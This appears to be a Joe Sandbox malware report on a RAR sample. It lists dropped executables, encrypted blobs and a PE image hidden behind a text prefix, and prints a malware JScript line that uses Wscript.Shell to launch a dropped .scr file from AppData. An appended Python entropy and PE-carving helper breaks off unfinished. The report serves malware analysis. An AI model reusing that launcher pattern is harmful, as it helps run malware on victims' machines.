EPjDBRbjWjdkBwcRYTSjrZwkKu.EPjDBRbjWjdkBwcRYTSjrZwkKu | unknown | unknown | false | | unknown
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1546128
    Start date and time:2024-10-31 14:32:48 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowsinteractivecookbook.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of new started processes analysed:40
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    Analysis Mode:stream
    Analysis stop reason:Timeout
    Sample name:#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar
    renamed because original name is a hash value
    Original Sample Name: .rar
    Detection:MAL
    Classification:mal72.expl.evad.winRAR@51/17@2/0
    • Exclude process from analysis (whitelisted): dllhost.exe
    • Excluded IPs from analysis (whitelisted): 52.165.164.15
    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes were analyzed; the report is missing behavior information
    • Report size getting too big, too many NtEnumerateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • VT rate limit hit for: #U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar
    Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):181
    Entropy (8bit):4.6090879213581575
    Encrypted:false
    SSDEEP:
    MD5:4733FFA94D8D0C283610719300F94545
    SHA1:BF49C5F5CAEDE6D922CA346BA9D50DFF3159A850
    SHA-256:F8901D3B3DC3717BC1D18A342FA2520E395B1BC8E5B1567EB19DE9857D4BEFB6
    SHA-512:C244A6D807A2F7A884E96A5D0068D8D4D744585545EFDB8408BCF23A09C344A0E1D696D1D5A1960840A8BCCFA079ADED13AA270BEFD58AA35DE5ECA4487903B1
    Malicious:false
    Reputation:unknown
    Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\NanoCipher.scr\" \"C:\\Users\\user\\AppData\\Local\\NanoSec Cryptographics\\o\"")
    Process:C:\Users\user\AppData\Local\Temp\185027\Spy.pif
    File Type:data
    Category:dropped
    Size (bytes):0 (as recorded; the hashes and preview below are identical to the 518748-byte drop from cmd.exe listed next, so this entry most likely captured the file before it was fully written)
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:
    MD5:CF5248A05D5201CB596BE18810555996
    SHA1:537010947EAB7BA675A99326BD9C3AF5D5CB1301
    SHA-256:D73BCC672158084ED5D6352648C58398AEBF5C7840ED7202C4991F8AA59EFFD7
    SHA-512:49AB322819C8D150B7C4AB4A6CD0DDCAC274E04545208E426C645E27C3742C407869B9B3185990E71BC85398F7B4B4D140F192005291CD59FA85254E86E87BEA
    Malicious:false
    Reputation:unknown
    Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:data
    Category:dropped
    Size (bytes):518748
    Entropy (8bit):7.999632035339632
    Encrypted:true
    SSDEEP:
    MD5:CF5248A05D5201CB596BE18810555996
    SHA1:537010947EAB7BA675A99326BD9C3AF5D5CB1301
    SHA-256:D73BCC672158084ED5D6352648C58398AEBF5C7840ED7202C4991F8AA59EFFD7
    SHA-512:49AB322819C8D150B7C4AB4A6CD0DDCAC274E04545208E426C645E27C3742C407869B9B3185990E71BC85398F7B4B4D140F192005291CD59FA85254E86E87BEA
    Malicious:false
    Reputation:unknown
    Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L
    Process:C:\Windows\SysWOW64\cmd.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:modified
    Size (bytes):893608
    Entropy (8bit):6.62028134425878
    Encrypted:false
    SSDEEP:
    MD5:18CE19B57F43CE0A5AF149C96AECC685
    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 5%
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\7-Zip\7zFM.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):1039137
    Entropy (8bit):7.970394348387481
    Encrypted:false
    SSDEEP:
    MD5:CBCB0FF5AA471E22A6B129196A556D97
    SHA1:B3DCA2CAC1624E6A8B318708C02376C1EB6AB784
    SHA-256:5C1CE789A60371E388881FFBE0311BD2829E5E8DBAF77506929E50638F22D866
    SHA-512:B98BB17994D5FDF38CB3A181BC15C3F64779AA33F7A508D1A9CE1E2AB1B1A2D9260C2DCDAF8C4F597738827A4DF6F906C55903DFDC0DA9216E3F656B8E0A73E0
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 8%
    Reputation:unknown
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................P.......G....@.................................4........@..................h(......d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....@......................@..B................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\7-Zip\7zFM.exe
    File Type:Unicode text, UTF-8 text, with no line terminators
    Category:dropped
    Size (bytes):140
    Entropy (8bit):3.964343144957258
    Encrypted:false
    SSDEEP:
    MD5:948A0D1D0F9DA30F9BE7A35AA65A137A
    SHA1:0E6C97B082D315520B28BB181CA9A04B3C4D62B8
    SHA-256:87C63257C618595CBAA52E7F42DA73811187E9321DD386520DDE630E5CD8DE85
    SHA-512:AACB6370A8B27DA7219EE4D7F587668C6C6C190F87F33987C7D625C0098593CC808EE8B0A8D01F7C977F37EB2DC90081F211B0B4A1D6648509E14F9E489CE7D1
    Malicious:false
    Reputation:unknown
    Preview:... .......... ................ ........... ............ ... ....... 937463543
    Process:C:\Program Files\7-Zip\7zFM.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):26
    Entropy (8bit):3.95006375643621
    Encrypted:false
    SSDEEP:
    MD5:187F488E27DB4AF347237FE461A079AD
    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
    Malicious:false
    Reputation:unknown
    Preview:[ZoneTransfer]....ZoneId=0
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):98304
    Entropy (8bit):7.997836829981676
    Encrypted:true
    SSDEEP:
    MD5:FA1CC3AB4F5055541732DDD8D875C135
    SHA1:8872AE2A2F63DAB182ABA07342CC8190E6EC1DDE
    SHA-256:FD897C1E947BD3BADAB64F72349C08BFB6CD5787A3EB627578334315B1268395
    SHA-512:4D3482B63F143B64E6A134FA86A880FBA32FF04738E574C93FAB6A13E290BB5BEA5FD227CB0DA820660F5868EEC804697682B77F8FFFA8E3DC138BDD77D6E993
    Malicious:false
    Reputation:unknown
    Preview:..w@...=..,..`-..5.....J.Pc.p<whJ..,5...&.,..~%..`{.U.>./..EN......v.\..FS....[?d..P m\.A..~.....+K.d.%..Fj. *......t&tawt>n.a.D.>p9.3...G.}...UQ..B....l..+..j~].AE.$..o.......e.;....MN-$!.3...._,e...GI.$....V.m9l.nim.c......]*...yX..^..p...u}..y.Z.7..1~`...2...].n..h4..1....|..............H:Kuq.6.X.DN......s8<...S..5.g.^.).:.<1..k1.[.N>.(B....uF...nk...}....r.a.2...E.T....w.....i.z.{.Z........L...c..J.B..H...:.@..vws0..<.<R..<....e..9.IO....xJ..)...o...*}nq.0.".b.e.....M..I.q.1.$Bt.r.l.>R`.....M.....ec+.&...F..~7/.8d(..8..-.^.)5..@........Ro.....{0.....{dn.....Q....z.I....~%....v...N.Mt..}..jV..Y.../9/.g......".0.....o..G.W....R.G...,...z.>.....$. ..a....K..q.W...../Q...P7.......5\.....]....An.....=.]3"V..6..<&....x...q..k.BX..>O......B.&T}.$n.........)..-Y...O...$k.......C...D..G.x...n.I..(.c......Z.k9..]..v.....%..Z'w.d...0..N....&.{3#.q/.n.....Q5........... hbpd.....L|.>......@.....:.............;....(.9D..!d.#..DBMr.0.:.
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):74752
    Entropy (8bit):7.997750754709227
    Encrypted:true
    SSDEEP:
    MD5:89E81DAB8000A2B73D9643E42A72DE15
    SHA1:6FAB41A9E7C5680070876B4CAB61C04F968C6572
    SHA-256:04E60272D87FEF156A62052EAE1C622C572DA81C26CD884BFE55E27C1C984A56
    SHA-512:F1B7274A630252DC34AF18FD01061EE2E32DFBAA86CDE6581ECF218474408C34FFA321B4A0037FEDFEA6909DAECE91B0429C4FBA89B8C48C6DF75AD58EF87B1E
    Malicious:false
    Reputation:unknown
    Preview:.U.\..k....G.].Z....0L.';.......>..a.R%....`Wz..R..R.aq..o .}aq.O_HK.s..%.in.......g.D.....3g..?.....!.rd......g....1-.B.DC........6....5.4z.0..J.S...e..W\.i;D$s......?^...}.C..R..X..Ip.!Cf.c?....9..`(.U.......qV.....7....u....-D'-.[.._.+..d/.2..m.5........9.f...\.?.........*#...aN..q......../bg.H.jK3:........._qK.F+*.P...y.T.%..I../..*.p.6UC.FE_:.>.M...7.........X...K.oJ..&..q........._.d...%_.u..h..g..].......2]..i?..s.y.b.*DU...`.K..jZd!...XO7ua...,&. ..Q.u.....AP..`I.@.Ik.)h...@.c.1D.\.v..W.....}..>.....$............Cz..aw.. .%.?.q-.U.i*....K..N?xs..4m..2...+.+.\..#..+k.t..?P. ..QF...;..cG._..v.1puu'.o.L. .u&.rA..%.....<f)o.+m.Y.....=5.."..D.M.z$......!.|........Wi...~9C.....J...q.I...^. {.\P...3x5...r.e.....W&l.Ez.A(.luM.R..@.!...s..z~...|w.}.B..'.O?......._<.}u2`.KBB.Sg.`@..=".m.$......! .x.+..A?{.b?.t.........h{.Z.`.%L.0.2.@..z.O..q&[.JiT#.'.t'.....>...b....3k8.XU._.W......?*..t"hiP....t[........Ek..JI.[.\(,..2...r..%H.........x...@...
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):87040
    Entropy (8bit):7.99786503957624
    Encrypted:true
    SSDEEP:
    MD5:451B264363660B3725CDFBC883227E38
    SHA1:6B695024901A21F973E82734434212E3C9C74133
    SHA-256:1FB0C5DB72F245600829D31A4987AED15A179F1157BAFB3C3AF86B56C36C5E73
    SHA-512:C15550CFF8DC14266C55FE94A66B9C6F16182669E0B606637A2267BF503C6CB270DE1BC806FD167480EE7691211F0ECB872ACA30C952A203C8421DE21AA1B5A4
    Malicious:false
    Reputation:unknown
    Preview:."..B.Y....z>.Y.........W'.O>K.i..#.M.1|f^".D.]#.f@..ck.....S..n.Z~...'........U.N' ~.... M..e..m)...U].............=.6..~<K...fT.(....}r21..... @L5..q.x...*`V..C..<.E.M.%.K..........y.4..:..$.6..;!....k'2.o...+....7#..E.6.W.......3.....4".l..I.W.Q..ag..Vd<..R.9......Ad.&%.b....w...C...n?....._.H.4s..P...QAQLg1JB.`1....Pr...V..ZA.,...........I.....^eQ.{...2$UE..g..}......t/?.z.....A...w.|x..$%........7.....q.7... {D%r.i...A...qz........z...]hC....|.......3.w.m..".hw......L:<V...h........bs.Tr.6.\...}..].*............}..e...F.l...Y.f.2+.%.ka.Q.e.:../[.,8MA.!.F.{..`..K..e.Q.V...A....3.X-..m;...]..;.u..h{.T.]eI.E.....v~...S~...~f.?.+]i._...D..=.....?.X..#..;W.m..s..p..UQO.Apwe.h.P?Eu.>...*e.3J.....&...^.....b.8......~..N6.1.<...T.......FZ=..b6...%2....4a. ..?......a.w.....+_Xkn.xE(.'D......xI..=.......\...|......"....3^..!.....VY.._/.w...X...(Q...t.,.%.Dh.];....hi...)\.......P.~L..oP..4.......94,4u...%{.rs.b.J...D.P..$..I...R......0.!j.>t.k.....
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):42588
    Entropy (8bit):7.995385083436723
    Encrypted:true
    SSDEEP:
    MD5:95DE9DB271D3B485FF1C553FA44CD0A1
    SHA1:E02F7F27DD2F22107CA1B61E7829F07DD76879B6
    SHA-256:D2735070FDD4EAEED64282C742486DC33A4F6A757D940C2073B2A96C0D19B985
    SHA-512:967DDA38A5333E6004FB85FC337E76BE5C4F4EAFFE865EDC9558F361279437A5A0289C086E03EC0E48DFF4FCEF42DAFB0097BAB15F34590CD3F8EA4645531724
    Malicious:false
    Reputation:unknown
    Preview:.....&.<..b..`...Z.32...3.h.......... .v.t...b...#c.Jn^)....`.b...=~u/.|..R......../e..l.p...yE...2.,d$.e.{YL.p.;...r.....\........"....&....-lv.sV.-&...n._...6.HlU.,..../f)m..(6....B@.k*[.*+.....~fg.7Sh%...Xc..J/K......Y...k..qP..s.<.........o>..6..Lmr.w\.P...z ......[2....G.A5..8...E.+..'@n|.=.J.s....I..l.L.s..FH...'3mY..J....?O...R4t./.../...."..)......{.v....`........|.....>..A...d."L.f..k.e...:.....T#.;m.+....IL.m;0...%!m....hE..=K.iJ..c...@.)}....4o..M$Y......:...k&.C.T;f..K.wt..).)...-..n.n.LGl....B..!...4..:...+s....(...f).rg1..V2.A%.N.j,....3...U-4.0.0...C..m=..&_.....6V.j.].#.t.z.|.d.. b...K3h.c.../{...F...I{*....F..!/....l....g;..T._l.%.v..z..'f.d....S.&...c.!!...9.P.../..U....q<h.*B..P..p...a..=E....|...h.<'.w..q....k....!.o.0........YD.Ox-.d...~@6@1z..;k.x}y'...f....:X,.T.....+.cl..=.Y.&.d1..........R=.....9.h-Z..&.(Z'...~...'^.(D.h<..S. ..c.3...].......2.W..C^n....?.hW...r...m...o..P..?..j.3.....L....Pt#.j.hOQL.{.._T.O..q?.X....
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):79872
    Entropy (8bit):7.997900445840888
    Encrypted:true
    SSDEEP:
    MD5:9E14B62B60B6D8DEFF595665714D21FB
    SHA1:FD2B5F9D546FB1181B2C3CF4F8E586AC60E469AA
    SHA-256:8DC24185E6F9691BD40730CBC52A0F28E3ECB338652AE6B172D52215FE84E4E2
    SHA-512:DF80B444B34E000A6CF76277A079ADA7D968E32FDD0728BF04810BFF78D709891CC2EDCD1446A24989593C246DFD34687F7B7481D132100CE4E19523FFA6A426
    Malicious:false
    Reputation:unknown
    Preview:.. ...C.87.j..{_..r.t...;.g...0.,q.~!..mVl..8.N{.}..{..J_q.9.1I..=.\.>.........+.,Cq.-...4...4.:..}...~g...Wjo. n..u..U.|....1,w..&....."..W0..ML.Q.o,........+.h....UcQ..;.$...........). L_.e....:U.B.pa..E...S3P...o. .:..o.:..$..G2..(0*;;...+aW...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rp...D.;.'.F...h.............p+....(.p+....(.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W.....`...;.....|p+......p+....(.m.........5...x..2).U.j....>..#.~......!.`|...l..)u-T..<,.......%=.'....|'.4....=._..G..._....[..}...X..I..b.x<......kxy(SRd.'N.e.S.fO%&9..{.$..\..;.6n..+q......K...<.....G...#t...WZB.mQ...?$...Hg.3b.0y.W..5...=q.Y.K...V...hI@.`Z@.$..2L
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):84992
    Entropy (8bit):7.997991765034814
    Encrypted:true
    SSDEEP:
    MD5:F79ED8CD25A0C0DF29B1E687D414B83F
    SHA1:5704CEA46FE8C6FFEFEC21DF2338D3405EC1F542
    SHA-256:9CA00221B738AF74CA71D637F22439B91D12E4C283E6F6CB7E58954EF83466F5
    SHA-512:CB5A9FF18E9EFC1F38216BD12CAC81787D354339558266435C42994F68A0DB06F64089B634B18257B2279A45613EAFF962BF16CA81EB3910E27762BCC1CA8365
    Malicious:false
    Reputation:unknown
    Preview:..0Q'.z.U....=......|........W....M......}.w......=Sl...R._cDX...w.C1.L...).^Thm..rL..@"..Ek*...=mHr.......Ifit1.2...$;....!.."%..1.i....7.../.#g 9z.s..e,..6.....T..#.O....G......!..Fo..t@._.>.`H:.;........O....w,.........?...$..G..i.._g...#..j.E}.......H..Q.....B.cK.B........k....Oi...&...5..n... ....&...V.mY..>.*.\......`.'\.....rD...2.Mnq.Oz.v...c..L...W/...Ay.F..V.QOZ.,.s..Q..$....a.RH!T....5u..B...B..CW..+mR..z?.....\....8.k@......3..'..G..|`....L........tu.9..(I.T^...K...y4.C.Z.9O.....-...'o!..... 7J.S."!..H..Kb...X.<.....;Yx3..vP.Cz.l...._.'>?.o..}GV..]........U....S>(....V.p.u....S...3&z..=CR.m*..&....#b.!.E....~.......X.b.._.C.....t.=^S.U.+.$.}m..e.M.B+."....!..92.z.k..1.N=]..}cC2..Q.e.w.LF..pb....dg.M......'.....mN..|.!E..2.].!r..QY]X(.~.2..F>"...Eh.sA.R.]..}.-.^.]..OQ.Zd.....\.....".b.|A...F..T&...O...(..y,5.7.x..Z.<..}A....^.....$..~ls.|...S.DK.\.g\..b...g.p......a...,.T...r......\...\.;.o.Z#.,./...i....g.....
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:modified
    Size (bytes):51200
    Entropy (8bit):7.996708631018947
    Encrypted:true
    SSDEEP:
    MD5:BDAD8A1F1980AC434AF0C3D0B92F8743
    SHA1:63B20AD7AADE68D1F0BF51085044FBF91A209323
    SHA-256:4B9785E33AB65B14ABD3167EFBBF6DB248B3E36B30A32FDB0105AC29FF51615E
    SHA-512:E515A5E58ECD18B089B52AF3E8ADE5DE97474736DFCA896FD5C1043C79347916FC2CFA53B658B058833D0F9E1B8D542BA8F56D749B318399A71E6034CE282194
    Malicious:false
    Reputation:unknown
    Preview:..".".......}.......a.........(..4D.wU_;....F...3....;...m.=...[.F...m..X^U^...I...B..8.J..KC.h..jY........6....f.. w\.%.YZK...Qg.p..2Y:8p_.]5...Dv6.A.g.zR..iw.wI..n..1q..}).4.b.....R.U..}r.7...s.....-#:.....e..........m+....l./n....Y...... R....H.d..f.;.......k.}*..H..J.g|...6..F....R...i.7..E7.f.R...n..O.....o......:r......B.3b..f..d1H{...5..*...............M....xB.' . .r.5..Ded.m...K.!\T..|...dt.v..i...B...K..7.'..+.F.......5.Js.H..q..m..............q.s'.tCk*3..e...IQ..E....?..|{.6...'.w.w..a....H..aM...w..^I..a...&.).F..."s7..P.....e.Z...e..X@W(.-...o.5'/x.......;..A`^..Cj..}.?.s3...s..P_..o...M>.f....N..Y.,..{C.F.].7.Y.g..;...g.$pu......t......Bb....Y.U.(#...S-3.~..4..Yz.!..4.A5Y/..j.4....d..#.......Y\Syu...E.........m....F..n.U.2P..g.....,({..o......d. ..s.f..Q.T.....n8V ........*...J..._.o.N..T....q._].U[ndvKy.......%.....m.|3......2i....5<.\wN...h.3....-......0]N.Y....|...`...".8..fI#.ww...y:~>..`.Z....^....h....Xv6c.9..3U..
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):886916
    Entropy (8bit):6.622152202054227
    Encrypted:false
    SSDEEP:
    MD5:3E017BD65EDFF0C040B35106A5C834AB
    SHA1:13A2011D56607D8315A96D3FE649D94B5C92535B
    SHA-256:961732D6B3C27D17BE771FC4347FD0B7C8D7A86F2FF9A3A6447553927E56E447
    SHA-512:B163879943E2778A2D682815DEA2FA15523CAB3F364E244CD6E508E6C99D1CB4BC466796443962E959BDA7EEDFCC3578218CA2DFF382485C632D55009B7BF671
    Malicious:false
    Reputation:unknown
    Preview:...j..u...8.I.j.....I._^[..]..........t....j...........E...sL.k.C.P&@.W&@..%@...C..%@.W&@................................U..8xL.....M.....t...9.t..@...M..J....@...]...Q.M..E.......H.I..E..8xL..E.P......E...U..M....t.W.}......N..._]...U..QQSVW.}..E.P..7....I..E...l....E...p....E.PV..p.I..M..E.;.t...uc;.x...u[.s..5..I....s........E.......E....;.|.....a....}..t...|...;............}..t......._^[..]....}....t.....x...|......U...M.VW...........|P;......H.Bt.......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91
    Process:C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
    File Type:data
    Category:dropped
    Size (bytes):6725
    Entropy (8bit):6.182223398021148
    Encrypted:false
    SSDEEP:
    MD5:E705FAE954799FD7B4782DC9FFA24252
    SHA1:03BEDEB38DF07BC6C99A7EA031DDC070A929F8FA
    SHA-256:D33FEA9A49EB3992712B778354C6CD3D295914F4A8A8233AB6EE40DD6658F4D7
    SHA-512:4585A7959D13D2E5AAE9C054CED4FD76AF9B6CA3191E2E95983F324255D18D2D8F130574D2DF81E0D457B1BDCB2ED1F782A344FF8F0ED850726131F3200EB119
    Malicious:false
    Reputation:unknown
    Preview:venezuelalandscapesmeantposters..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...............................................................................................................................................................................................................................................
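Added example, not part of the Joe Sandbox report: a Python triage helper that reproduces the Entropy (8bit) and Encrypted columns for the dropped blobs listed above and locates a PE image hidden behind a text prefix, the pattern visible in the 6725-byte drop whose preview starts with `venezuelalandscapesmeantposters` before the `MZ` header. The 7.9 threshold is an assumption (every Encrypted:true entry above scores 7.99+, but the sandbox's exact cut-off is not on the page); the sample bytes are constructed, not the real drops, and the two unprintable bytes in that preview are rendered as CRLF by assumption. Note that entropy near 8.0 also fits compressed data (the RAR itself scores 7.9998), so the flag is a hint, not proof of encryption.

```python
"""Triage helpers for dropped files: 8-bit entropy, an Encrypted-style flag, and carving a PE hidden behind junk."""
import math
import random
import struct

# Assumption: a drop is flagged Encrypted when its entropy is near the 8.0 ceiling.
ENCRYPTED_THRESHOLD = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def looks_encrypted(data: bytes) -> bool:
    """Mirror the report's Encrypted column; compressed data scores just as high, so treat it as a hint."""
    return shannon_entropy(data) >= ENCRYPTED_THRESHOLD


def find_pe_offset(data: bytes) -> int:
    """Offset of the first 'MZ' whose e_lfanew field points at a valid NT signature, else -1."""
    pos = data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            sig = pos + e_lfanew
            if e_lfanew >= 0x40 and sig + 4 <= len(data) and data[sig:sig + 4] == b"PE\0\0":
                return pos
        pos = data.find(b"MZ", pos + 1)
    return -1


def carve_pe(data: bytes) -> bytes:
    """Strip everything before the embedded MZ header so the image can be hashed and scanned on its own."""
    off = find_pe_offset(data)
    return data[off:] if off >= 0 else b""


def triage(data: bytes) -> dict:
    """Produce the same kind of row the report prints for each dropped file."""
    off = find_pe_offset(data)
    if off < 0:
        label = "data"
    elif off == 0:
        label = "PE image"
    else:
        label = f"PE image behind {off}-byte prefix"
    return {
        "size": len(data),
        "entropy": round(shannon_entropy(data), 6),
        "encrypted": looks_encrypted(data),
        "pe_offset": off,
        "label": label,
    }


# --- constructed samples (not bytes taken from the report) ---------------------------------
# Minimal stub PE: DOS header with e_lfanew = 0x40, followed by the NT signature and padding.
STUB_PE = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 0x100
# The 6725-byte drop shows text before its MZ header; its two unprintable bytes are CRLF here (assumption).
JUNK_PREFIX = b"venezuelalandscapesmeantposters\r\n"
PREFIXED_PE = JUNK_PREFIX + STUB_PE
# Deterministic pseudo-random bytes stand in for an encrypted blob; plain ASCII stands in for the batch/JS drops.
RANDOM_BLOB = random.Random(1546128).randbytes(65536)
TEXT_BLOB = b"Set Uses=V\r\nSet Choosing= \r\nSet Corp=7\r\n" * 64

if __name__ == "__main__":
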